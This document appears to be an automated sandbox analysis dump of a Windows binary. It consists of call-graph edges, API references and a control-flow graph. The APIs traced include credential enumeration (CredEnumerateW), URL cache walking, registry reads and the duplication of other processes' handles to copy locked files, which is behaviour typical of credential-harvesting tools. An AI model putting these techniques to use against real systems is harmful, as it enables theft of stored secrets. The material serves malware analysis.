38168->38326 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38327 410c46 10 API calls 38171->38327 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38180->37976 38182 40eb10 38181->38182 38194 40e8e0 38182->38194 38185 40eb6c memcpy memcpy 38186 40ebb7 38185->38186 38186->38185 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38186->38187 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38191 40ec65 38187->38191 38188->38186 38189->38191 38191->38191 38204 40ea7f 38191->38204 38193 402f49 38193->37976 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e911 38197->38199 38200 40e90a ??3@YAXPAX 38197->38200 38198->38197 38201 40e931 ??2@YAPAXI ??2@YAPAXI 38199->38201 38202 40e921 ??3@YAXPAX 38199->38202 38203 40e92a ??3@YAXPAX 38199->38203 38200->38199 38201->38185 38202->38203 38203->38201 38205 40aa04 ??3@YAXPAX 38204->38205 38206 40ea88 38205->38206 38207 40aa04 ??3@YAXPAX 38206->38207 38208 40ea90 38207->38208 38209 40aa04 ??3@YAXPAX 38208->38209 38210 40ea98 38209->38210 38211 40aa04 ??3@YAXPAX 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38152 38222->38156 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 
38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38287 40b5e7 38284->38287 38285->38282 38286->38287 38288 40b5d0 SizeofResource LockResource 38286->38288 38287->38285 38296 40afcf 38287->38296 38288->38287 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 
38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 444a64 FreeLibrary 38305->38306 38307 444a83 38305->38307 38306->38307 38307->38170 38309 4032c4 38308->38309 38310 40b633 ??3@YAXPAX 38309->38310 38311 403316 38310->38311 38328 44553b 38311->38328 38315 403480 38524 40368c 15 API calls 38315->38524 38317 403489 38318 40b633 ??3@YAXPAX 38317->38318 38319 403495 38318->38319 38319->38170 38320 4033a9 memset memcpy 38321 4033ec wcscmp 38320->38321 38322 40333c 38320->38322 38321->38322 38322->38315 38322->38320 38322->38321 38522 4028e7 11 API calls 38322->38522 38523 40f508 6 API calls 38322->38523 38324 403421 _wcsicmp 38324->38322 38326->38170 38327->38171 38329 445548 38328->38329 38330 445599 38329->38330 38525 40c768 38329->38525 38331 4455a8 memset 38330->38331 38338 4457f2 38330->38338 38608 403988 38331->38608 38342 445854 38338->38342 38710 403e2d memset memset memset memset memset 38338->38710 38339 445672 38619 403fbe memset memset memset memset memset 38339->38619 38340 4458bb memset memset 38346 414c2e 16 API calls 38340->38346 38391 4458aa 38342->38391 38733 403c9c memset memset memset memset memset 38342->38733 38344 44595e memset memset 38351 414c2e 16 API calls 38344->38351 38345 4455e5 38345->38339 38354 44560f 38345->38354 38347 4458f9 38346->38347 38352 40b2cc 27 API calls 38347->38352 38349 445a00 memset memset 38756 414c2e 38349->38756 38350 445b22 38356 445bca 38350->38356 38357 445b38 memset memset memset 38350->38357 38361 44599c 38351->38361 38362 445909 38352->38362 38365 4087b3 338 API calls 38354->38365 38355 445849 38820 40b1ab ??3@YAXPAX ??3@YAXPAX 38355->38820 38363 445c8b memset memset 38356->38363 38430 445cf0 38356->38430 38366 445bd4 38357->38366 38367 445b98 38357->38367 38370 40b2cc 27 API calls 38361->38370 38371 409d1f 6 API calls 38362->38371 38374 414c2e 16 API calls 38363->38374 38364 44589f 38821 40b1ab ??3@YAXPAX ??3@YAXPAX 38364->38821 
38372 445621 38365->38372 38380 414c2e 16 API calls 38366->38380 38367->38366 38376 445ba2 38367->38376 38373 4459ac 38370->38373 38384 445919 38371->38384 38806 4454bf 20 API calls 38372->38806 38386 409d1f 6 API calls 38373->38386 38387 445cc9 38374->38387 38893 4099c6 wcslen 38376->38893 38377 4456b2 38808 40b1ab ??3@YAXPAX ??3@YAXPAX 38377->38808 38379 40b2cc 27 API calls 38392 445a4f 38379->38392 38394 445be2 38380->38394 38381 403335 38521 4452e5 45 API calls 38381->38521 38382 445d3d 38414 40b2cc 27 API calls 38382->38414 38383 445d88 memset memset memset 38397 414c2e 16 API calls 38383->38397 38822 409b98 GetFileAttributesW 38384->38822 38385 445823 38385->38355 38396 4087b3 338 API calls 38385->38396 38398 4459bc 38386->38398 38399 409d1f 6 API calls 38387->38399 38389 445879 38389->38364 38410 4087b3 338 API calls 38389->38410 38391->38340 38415 44594a 38391->38415 38771 409d1f wcslen wcslen 38392->38771 38403 40b2cc 27 API calls 38394->38403 38396->38385 38407 445dde 38397->38407 38889 409b98 GetFileAttributesW 38398->38889 38409 445ce1 38399->38409 38400 445bb3 38896 445403 memset 38400->38896 38401 445680 38401->38377 38642 4087b3 memset 38401->38642 38404 445bf3 38403->38404 38413 409d1f 6 API calls 38404->38413 38405 445928 38405->38415 38823 40b6ef 38405->38823 38416 40b2cc 27 API calls 38407->38416 38913 409b98 GetFileAttributesW 38409->38913 38410->38389 38424 445c07 38413->38424 38425 445d54 _wcsicmp 38414->38425 38415->38344 38429 4459ed 38415->38429 38428 445def 38416->38428 38417 4459cb 38417->38429 38438 40b6ef 252 API calls 38417->38438 38421 40b2cc 27 API calls 38422 445a94 38421->38422 38776 40ae18 38422->38776 38423 44566d 38423->38338 38693 413d4c 38423->38693 38434 445389 258 API calls 38424->38434 38435 445d71 38425->38435 38500 445d67 38425->38500 38427 445665 38807 40b1ab ??3@YAXPAX ??3@YAXPAX 38427->38807 38436 409d1f 6 API calls 38428->38436 38429->38349 38429->38350 38430->38381 38430->38382 38430->38383 38431 445389 258 API calls 
38431->38356 38440 445c17 38434->38440 38914 445093 23 API calls 38435->38914 38443 445e03 38436->38443 38438->38429 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38427 38448 4087b3 338 API calls 38442->38448 38915 409b98 GetFileAttributesW 38443->38915 38444 40b6ef 252 API calls 38444->38381 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38381 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38466 40b2cc 27 API calls 38453->38466 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38474 445ab2 memset 38456->38474 38487 409d1f 6 API calls 38456->38487 38783 40add4 38456->38783 38788 445389 38456->38788 38797 40ae51 38456->38797 38457 4456eb 38462 4456fd memset memset memset memset 38457->38462 38463 4457ea 38457->38463 38464 445389 258 API calls 38458->38464 38890 40aebe 38459->38890 38917 445093 23 API calls 38460->38917 38810 409c70 wcscpy wcsrchr 38462->38810 38813 413d29 38463->38813 38469 445c47 38464->38469 38470 445e33 38466->38470 38476 40b2cc 27 API calls 38469->38476 38477 409d1f 6 API calls 38470->38477 38472 445e7e 38473 445f67 38472->38473 38482 40b2cc 27 API calls 38473->38482 38478 40b2cc 27 API calls 38474->38478 38480 445c53 38476->38480 38481 445e47 38477->38481 38478->38456 38479 409c70 2 API calls 38483 44577e 38479->38483 38484 409d1f 6 API calls 38480->38484 38916 409b98 GetFileAttributesW 38481->38916 38486 445f73 38482->38486 38488 409c70 2 API calls 38483->38488 38489 445c67 38484->38489 38491 409d1f 6 API calls 38486->38491 38487->38456 38492 44578d 38488->38492 38493 445389 258 API calls 38489->38493 38490 445e56 38490->38460 38496 445e83 memset 38490->38496 38494 445f87 38491->38494 38492->38463 38499 40b2cc 27 API calls 38492->38499 38493->38356 38920 409b98 GetFileAttributesW 38494->38920 38498 40b2cc 27 API calls 38496->38498 38501 445eab 
38498->38501 38502 4457a8 38499->38502 38500->38381 38500->38444 38503 409d1f 6 API calls 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 445ebf 38503->38505 38506 4457b8 38504->38506 38507 40ae18 9 API calls 38505->38507 38812 409b98 GetFileAttributesW 38506->38812 38517 445ef5 38507->38517 38509 4457c7 38509->38463 38511 4087b3 338 API calls 38509->38511 38510 40ae51 9 API calls 38510->38517 38511->38463 38512 445f5c 38514 40aebe FindClose 38512->38514 38513 40add4 2 API calls 38513->38517 38514->38473 38515 40b2cc 27 API calls 38515->38517 38516 409d1f 6 API calls 38516->38517 38517->38510 38517->38512 38517->38513 38517->38515 38517->38516 38519 445f3a 38517->38519 38918 409b98 GetFileAttributesW 38517->38918 38919 445093 23 API calls 38519->38919 38521->38322 38522->38324 38523->38322 38524->38317 38526 40c775 38525->38526 38921 40b1ab ??3@YAXPAX ??3@YAXPAX 38526->38921 38528 40c788 38922 40b1ab ??3@YAXPAX ??3@YAXPAX 38528->38922 38530 40c790 38923 40b1ab ??3@YAXPAX ??3@YAXPAX 38530->38923 38532 40c798 38533 40aa04 ??3@YAXPAX 38532->38533 38534 40c7a0 38533->38534 38924 40c274 memset 38534->38924 38539 40a8ab 9 API calls 38540 40c7c3 38539->38540 38541 40a8ab 9 API calls 38540->38541 38542 40c7d0 38541->38542 38953 40c3c3 38542->38953 38546 40c7e5 38547 40c877 38546->38547 38548 40c86c 38546->38548 38554 40c634 49 API calls 38546->38554 38978 40a706 38546->38978 38555 40bdb0 38547->38555 38995 4053fe 39 API calls 38548->38995 38554->38546 39185 404363 38555->39185 38558 40bf5d 39205 40440c 38558->39205 38560 40bdee 38560->38558 38563 40b2cc 27 API calls 38560->38563 38561 40bddf CredEnumerateW 38561->38560 38564 40be02 wcslen 38563->38564 38564->38558 38566 40be1e 38564->38566 38565 40be26 _wcsncoll 38565->38566 38566->38558 38566->38565 38569 40be7d memset 38566->38569 38570 40bea7 memcpy 38566->38570 38571 40bf11 wcschr 38566->38571 38572 40b2cc 27 API calls 38566->38572 38574 40bf43 LocalFree 38566->38574 39208 40bd5d 28 API calls 38566->39208 
39209 404423 38566->39209 38569->38566 38569->38570 38570->38566 38570->38571 38571->38566 38573 40bef6 _wcsnicmp 38572->38573 38573->38566 38573->38571 38574->38566 38575 4135f7 39222 4135e0 38575->39222 38578 40b2cc 27 API calls 38579 41360d 38578->38579 38580 40a804 8 API calls 38579->38580 38581 413613 38580->38581 38609 40399d 38608->38609 39251 403a16 38609->39251 38611 403a09 39265 40b1ab ??3@YAXPAX ??3@YAXPAX 38611->39265 38613 403a12 wcsrchr 38613->38345 38614 4039a3 38614->38611 38617 4039f4 38614->38617 39262 40a02c CreateFileW 38614->39262 38617->38611 38618 4099c6 2 API calls 38617->38618 38618->38611 38620 414c2e 16 API calls 38619->38620 38621 404048 38620->38621 38622 414c2e 16 API calls 38621->38622 38623 404056 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 404073 38624->38625 38626 409d1f 6 API calls 38625->38626 38627 40408e 38626->38627 38628 409d1f 6 API calls 38627->38628 38629 4040a6 38628->38629 38630 403af5 20 API calls 38629->38630 38631 4040ba 38630->38631 38632 403af5 20 API calls 38631->38632 38633 4040cb 38632->38633 39292 40414f memset 38633->39292 38635 404140 39306 40b1ab ??3@YAXPAX ??3@YAXPAX 38635->39306 38637 4040ec memset 38640 4040e0 38637->38640 38638 404148 38638->38401 38639 4099c6 2 API calls 38639->38640 38640->38635 38640->38637 38640->38639 38641 40a8ab 9 API calls 38640->38641 38641->38640 39319 40a6e6 WideCharToMultiByte 38642->39319 38644 4087ed 39320 4095d9 memset 38644->39320 38694 40b633 ??3@YAXPAX 38693->38694 38695 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38694->38695 38696 413f00 Process32NextW 38695->38696 38697 413da5 OpenProcess 38696->38697 38698 413f17 CloseHandle 38696->38698 38699 413df3 memset 38697->38699 38704 413eb0 38697->38704 38698->38439 39631 413f27 38699->39631 38701 413ebf ??3@YAXPAX 38701->38704 38702 4099f4 3 API calls 38702->38704 38704->38696 38704->38701 38704->38702 38705 413e37 GetModuleHandleW 38706 413e1f 38705->38706 38707 413e46 GetProcAddress 38705->38707 
38706->38705 39636 413959 38706->39636 39652 413ca4 38706->39652 38707->38706 38709 413ea2 CloseHandle 38709->38704 38711 414c2e 16 API calls 38710->38711 38712 403eb7 38711->38712 38713 414c2e 16 API calls 38712->38713 38714 403ec5 38713->38714 38715 409d1f 6 API calls 38714->38715 38716 403ee2 38715->38716 38717 409d1f 6 API calls 38716->38717 38718 403efd 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 403f15 38719->38720 38721 403af5 20 API calls 38720->38721 38722 403f29 38721->38722 38723 403af5 20 API calls 38722->38723 38724 403f3a 38723->38724 38725 40414f 33 API calls 38724->38725 38730 403f4f 38725->38730 38726 403faf 39666 40b1ab ??3@YAXPAX ??3@YAXPAX 38726->39666 38728 403f5b memset 38728->38730 38729 403fb7 38729->38385 38730->38726 38730->38728 38731 4099c6 2 API calls 38730->38731 38732 40a8ab 9 API calls 38730->38732 38731->38730 38732->38730 38734 414c2e 16 API calls 38733->38734 38735 403d26 38734->38735 38736 414c2e 16 API calls 38735->38736 38737 403d34 38736->38737 38738 409d1f 6 API calls 38737->38738 38739 403d51 38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403d6c 38740->38741 38742 409d1f 6 API calls 38741->38742 38743 403d84 38742->38743 38744 403af5 20 API calls 38743->38744 38745 403d98 38744->38745 38746 403af5 20 API calls 38745->38746 38747 403da9 38746->38747 38748 40414f 33 API calls 38747->38748 38749 403dbe 38748->38749 38750 403e1e 38749->38750 38751 403dca memset 38749->38751 38754 4099c6 2 API calls 38749->38754 38755 40a8ab 9 API calls 38749->38755 39667 40b1ab ??3@YAXPAX ??3@YAXPAX 38750->39667 38751->38749 38753 403e26 38753->38389 38754->38749 38755->38749 38757 414b81 9 API calls 38756->38757 38758 414c40 38757->38758 38759 414c73 memset 38758->38759 39668 409cea 38758->39668 38760 414c94 38759->38760 39671 414592 RegOpenKeyExW 38760->39671 38763 414c64 38763->38379 38765 414cc1 38766 414cf4 wcscpy 38765->38766 39672 414bb0 wcscpy 38765->39672 38766->38763 38768 414cd2 39673 4145ac RegQueryValueExW 
38768->39673 38770 414ce9 RegCloseKey 38770->38766 38772 409d62 38771->38772 38773 409d43 wcscpy 38771->38773 38772->38421 38774 409719 2 API calls 38773->38774 38775 409d51 wcscat 38774->38775 38775->38772 38777 40aebe FindClose 38776->38777 38778 40ae21 38777->38778 38779 4099c6 2 API calls 38778->38779 38780 40ae35 38779->38780 38781 409d1f 6 API calls 38780->38781 38782 40ae49 38781->38782 38782->38456 38784 40ade0 38783->38784 38785 40ae0f 38783->38785 38784->38785 38786 40ade7 wcscmp 38784->38786 38785->38456 38786->38785 38787 40adfe wcscmp 38786->38787 38787->38785 38789 40ae18 9 API calls 38788->38789 38795 4453c4 38789->38795 38790 40ae51 9 API calls 38790->38795 38791 4453f3 38793 40aebe FindClose 38791->38793 38792 40add4 2 API calls 38792->38795 38794 4453fe 38793->38794 38794->38456 38795->38790 38795->38791 38795->38792 38796 445403 253 API calls 38795->38796 38796->38795 38798 40ae7b FindNextFileW 38797->38798 38799 40ae5c FindFirstFileW 38797->38799 38800 40ae94 38798->38800 38801 40ae8f 38798->38801 38799->38800 38803 409d1f 6 API calls 38800->38803 38804 40aeb6 38800->38804 38802 40aebe FindClose 38801->38802 38802->38800 38803->38804 38804->38456 38806->38442 38807->38423 38808->38423 38809->38457 38811 409c89 38810->38811 38811->38479 38812->38509 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 ??3@YAXPAX 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 ??3@YAXPAX 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38342 38821->38391 38822->38405 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39674 409b98 GetFileAttributesW 38833->39674 38835 40b792 38836 40b7c2 38835->38836 38837 409c70 2 API calls 38835->38837 
39675 40bb98 38836->39675 38839 40b7a5 38837->38839 38841 40b2cc 27 API calls 38839->38841 38845 40b7b2 38841->38845 38842 40b837 FindCloseChangeNotification 38844 40b83e memset 38842->38844 38843 40b817 39709 409a45 GetTempPathW 38843->39709 39708 40a6e6 WideCharToMultiByte 38844->39708 38848 409d1f 6 API calls 38845->38848 38848->38836 38849 40b827 CopyFileW 38849->38844 38850 40b866 38851 444432 121 API calls 38850->38851 38852 40b879 38851->38852 38853 40bad5 38852->38853 38854 40b273 27 API calls 38852->38854 38855 40baeb 38853->38855 38856 40bade DeleteFileW 38853->38856 38857 40b89a 38854->38857 38858 40b04b ??3@YAXPAX 38855->38858 38856->38855 38859 438552 134 API calls 38857->38859 38860 40baf3 38858->38860 38861 40b8a4 38859->38861 38860->38415 38862 40bacd 38861->38862 38864 4251c4 137 API calls 38861->38864 38863 443d90 111 API calls 38862->38863 38863->38853 38887 40b8b8 38864->38887 38865 40bac6 39721 424f26 123 API calls 38865->39721 38866 40b8bd memset 39712 425413 17 API calls 38866->39712 38869 425413 17 API calls 38869->38887 38872 40a71b MultiByteToWideChar 38872->38887 38873 40a734 MultiByteToWideChar 38873->38887 38876 40b9b5 memcmp 38876->38887 38877 4099c6 2 API calls 38877->38887 38878 404423 37 API calls 38878->38887 38880 40bb3e memset memcpy 39722 40a734 MultiByteToWideChar 38880->39722 38881 4251c4 137 API calls 38881->38887 38884 40bb88 LocalFree 38884->38887 38887->38865 38887->38866 38887->38869 38887->38872 38887->38873 38887->38876 38887->38877 38887->38878 38887->38880 38887->38881 38888 40ba5f memcmp 38887->38888 39713 4253ef 16 API calls 38887->39713 39714 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38887->39714 39715 4253af 17 API calls 38887->39715 39716 4253cf 17 API calls 38887->39716 39717 447280 memset 38887->39717 39718 447960 memset memcpy memcpy memcpy 38887->39718 39719 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38887->39719 39720 447920 memcpy memcpy memcpy 38887->39720 38888->38887 38889->38417 38891 40aed1 
38890->38891 38892 40aec7 FindClose 38890->38892 38891->38350 38892->38891 38894 4099d7 38893->38894 38895 4099da memcpy 38893->38895 38894->38895 38895->38400 38897 40b2cc 27 API calls 38896->38897 38898 44543f 38897->38898 38899 409d1f 6 API calls 38898->38899 38900 44544f 38899->38900 39814 409b98 GetFileAttributesW 38900->39814 38902 44545e 38903 445476 38902->38903 38904 40b6ef 252 API calls 38902->38904 38905 40b2cc 27 API calls 38903->38905 38904->38903 38906 445482 38905->38906 38907 409d1f 6 API calls 38906->38907 38908 445492 38907->38908 39815 409b98 GetFileAttributesW 38908->39815 38910 4454a1 38911 4454b9 38910->38911 38912 40b6ef 252 API calls 38910->38912 38911->38431 38912->38911 38913->38430 38914->38447 38915->38453 38916->38490 38917->38472 38918->38517 38919->38517 38920->38500 38921->38528 38922->38530 38923->38532 38925 414c2e 16 API calls 38924->38925 38926 40c2ae 38925->38926 38996 40c1d3 38926->38996 38931 40c3be 38948 40a8ab 38931->38948 38932 40afcf 2 API calls 38933 40c2fd FindFirstUrlCacheEntryW 38932->38933 38934 40c3b6 38933->38934 38935 40c31e wcschr 38933->38935 38936 40b04b ??3@YAXPAX 38934->38936 38937 40c331 38935->38937 38938 40c35e FindNextUrlCacheEntryW 38935->38938 38936->38931 38939 40a8ab 9 API calls 38937->38939 38938->38935 38940 40c373 GetLastError 38938->38940 38943 40c33e wcschr 38939->38943 38941 40c3ad FindCloseUrlCache 38940->38941 38942 40c37e 38940->38942 38941->38934 38944 40afcf 2 API calls 38942->38944 38943->38938 38945 40c34f 38943->38945 38946 40c391 FindNextUrlCacheEntryW 38944->38946 38947 40a8ab 9 API calls 38945->38947 38946->38935 38946->38941 38947->38938 39112 40a97a 38948->39112 38951 40a8cc 38951->38539 38952 40a8d0 7 API calls 38952->38951 39117 40b1ab ??3@YAXPAX ??3@YAXPAX 38953->39117 38955 40c3dd 38956 40b2cc 27 API calls 38955->38956 38957 40c3e7 38956->38957 39118 414592 RegOpenKeyExW 38957->39118 38959 40c3f4 38960 40c50e 38959->38960 38961 40c3ff 38959->38961 38975 405337 38960->38975 38962 
40a9ce 4 API calls 38961->38962 38963 40c418 memset 38962->38963 39119 40aa1d 38963->39119 38966 40c471 38968 40c47a _wcsupr 38966->38968 38967 40c505 RegCloseKey 38967->38960 38969 40a8d0 7 API calls 38968->38969 38970 40c498 38969->38970 38971 40a8d0 7 API calls 38970->38971 38972 40c4ac memset 38971->38972 38973 40aa1d 38972->38973 38974 40c4e4 RegEnumValueW 38973->38974 38974->38967 38974->38968 39121 405220 38975->39121 38979 4099c6 2 API calls 38978->38979 38980 40a714 _wcslwr 38979->38980 38981 40c634 38980->38981 39178 405361 38981->39178 38984 40c65c wcslen 39181 4053b6 39 API calls 38984->39181 38985 40c71d wcslen 38985->38546 38987 40c677 38988 40c713 38987->38988 39182 40538b 39 API calls 38987->39182 39184 4053df 39 API calls 38988->39184 38991 40c6a5 38991->38988 38992 40c6a9 memset 38991->38992 38993 40c6d3 38992->38993 39183 40c589 43 API calls 38993->39183 38995->38547 38997 40ae18 9 API calls 38996->38997 39003 40c210 38997->39003 38998 40ae51 9 API calls 38998->39003 38999 40c264 39000 40aebe FindClose 38999->39000 39002 40c26f 39000->39002 39001 40add4 2 API calls 39001->39003 39008 40e5ed memset memset 39002->39008 39003->38998 39003->38999 39003->39001 39004 40c231 _wcsicmp 39003->39004 39005 40c1d3 35 API calls 39003->39005 39004->39003 39006 40c248 39004->39006 39005->39003 39021 40c084 22 API calls 39006->39021 39009 414c2e 16 API calls 39008->39009 39010 40e63f 39009->39010 39011 409d1f 6 API calls 39010->39011 39012 40e658 39011->39012 39022 409b98 GetFileAttributesW 39012->39022 39014 40e667 39015 40e680 39014->39015 39017 409d1f 6 API calls 39014->39017 39023 409b98 GetFileAttributesW 39015->39023 39017->39015 39018 40e68f 39019 40c2d8 39018->39019 39024 40e4b2 39018->39024 39019->38931 39019->38932 39021->39003 39022->39014 39023->39018 39045 40e01e 39024->39045 39026 40e593 39028 40e5b0 39026->39028 39029 40e59c DeleteFileW 39026->39029 39027 40e521 39027->39026 39068 40e175 39027->39068 39030 40b04b ??3@YAXPAX 39028->39030 
39029->39028 39031 40e5bb 39030->39031 39033 40e5c4 CloseHandle 39031->39033 39034 40e5cc 39031->39034 39033->39034 39036 40b633 ??3@YAXPAX 39034->39036 39035 40e573 39037 40e584 39035->39037 39038 40e57c FindCloseChangeNotification 39035->39038 39039 40e5db 39036->39039 39111 40b1ab ??3@YAXPAX ??3@YAXPAX 39037->39111 39038->39037 39042 40b633 ??3@YAXPAX 39039->39042 39041 40e540 39041->39035 39088 40e2ab 39041->39088 39043 40e5e3 39042->39043 39043->39019 39046 406214 22 API calls 39045->39046 39047 40e03c 39046->39047 39048 40e16b 39047->39048 39049 40dd85 74 API calls 39047->39049 39048->39027 39050 40e06b 39049->39050 39050->39048 39051 40afcf ??2@YAPAXI ??3@YAXPAX 39050->39051 39052 40e08d OpenProcess 39051->39052 39053 40e0a4 GetCurrentProcess DuplicateHandle 39052->39053 39057 40e152 39052->39057 39054 40e0d0 GetFileSize 39053->39054 39055 40e14a CloseHandle 39053->39055 39058 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39054->39058 39055->39057 39056 40e160 39060 40b04b ??3@YAXPAX 39056->39060 39057->39056 39059 406214 22 API calls 39057->39059 39061 40e0ea 39058->39061 39059->39056 39060->39048 39062 4096dc CreateFileW 39061->39062 39063 40e0f1 CreateFileMappingW 39062->39063 39064 40e140 CloseHandle CloseHandle 39063->39064 39065 40e10b MapViewOfFile 39063->39065 39064->39055 39066 40e13b FindCloseChangeNotification 39065->39066 39067 40e11f WriteFile UnmapViewOfFile 39065->39067 39066->39064 39067->39066 39069 40e18c 39068->39069 39070 406b90 11 API calls 39069->39070 39071 40e19f 39070->39071 39072 40e1a7 memset 39071->39072 39073 40e299 39071->39073 39078 40e1e8 39072->39078 39074 4069a3 ??3@YAXPAX ??3@YAXPAX 39073->39074 39075 40e2a4 39074->39075 39075->39041 39076 406e8f 13 API calls 39076->39078 39077 406b53 SetFilePointerEx ReadFile 39077->39078 39078->39076 39078->39077 39079 40e283 39078->39079 39080 40dd50 _wcsicmp 39078->39080 39084 40742e 8 API calls 39078->39084 39085 40aae3 wcslen wcslen _memicmp 39078->39085 39086 40e244 
[Control-flow graph: node and edge data of the interactive graph viewer (function addresses with resolved API names such as GetProcAddress, CreateFileW, ReadFile, RegEnumValueW, GetPrivateProfileStringW, WritePrivateProfileStringW, FindResourceW, LoadResource, LockResource, EnumResourceNamesW), not reproduced.]

                                          Control-flow Graph: function 0040DD85, blocks 40dd85..40e01b (rendered graph and executed/not-executed colouring not reproduced). Three loops are visible in the edge list: 40ddf1->40de0b->40de20->40de29->40ddf1 retries NtQuerySystemInformation with a larger buffer; 40de94->...->40dffd->40de94 walks the process list, reaching OpenProcess after the three _wcsicmp name checks; 40df0b->40df16->40df23->...->40dfbd->40df0b walks the returned handle table, calling GetCurrentProcess/DuplicateHandle per entry and closing each duplicate after the _wcsicmp at 40df8f.
                                          APIs
                                          • memset.MSVCRT ref: 0040DDAD
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                          • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
